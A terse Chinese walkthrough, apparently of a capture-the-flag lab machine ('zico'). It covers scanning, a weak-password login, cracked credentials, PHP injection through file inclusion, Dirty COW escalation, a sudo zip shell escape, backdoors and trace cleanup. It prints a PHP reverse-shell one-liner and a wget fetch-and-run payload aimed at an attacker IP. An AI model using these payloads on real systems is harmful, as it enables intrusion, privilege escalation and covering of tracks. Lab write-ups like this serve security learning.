1.主机发现php
2.端口扫描python
3.目录扫描web
4.端口访问shell
尝试一下,含有文件包含漏洞数据库
5.访问扫描出来的目录ssh
发现登陆端口,须要输入密码测试
尝试弱口令admin登陆成功spa
信息查询,发现用户名、密码.net
md5解密试试,root用户密码为:34kroot343d
zico用户密码为:zico2215@
因为存在ssh服务端口,尝试链接
链接失败!
6.漏洞搜索
查看文件
验证步骤以下:
存在远程PHP代码注入漏洞,尝试在数据库中插入phpinfo()语句,利用文件包含
测试成功
7.获取shell
攻击机上写反弹shell脚本
<?php $sock=fsockopen("192.168.109.159",7777);exec("/bin/sh -i <&3 >&3 2>&3");?>
打开Apache服务
删除以前创建的表a,新建表b,在目标数据库插入代码
<?php system("wget 192.168.109.159/shell.txt -O /tmp/shell.php;php /tmp/shell.php");?>
打开监听
访问网页:文件读取
获取shell并转换为交互式
查看权限
8.脏牛提权
下载脏牛文件到靶机/tmp目录下
编译文件并执行
切换用户
至此,提权成功!
9.拓展
看看文件
尝试远程登陆成功
使用命令失败
sudo zip exploit.zip exploit -T --unzip-command="python -c 'import pty; pty.spawn(\"/bin/sh\")'"
命令成功参考: http://www.noobyard.com/article/p-ezhddzjc-mw.html
暂时未能找到解决方案,可采用脏牛提权!
经过脏牛提权后,能够编写后门文件
清除痕迹,恢复password文件
菜刀链接,获取webshell权限
链接成功!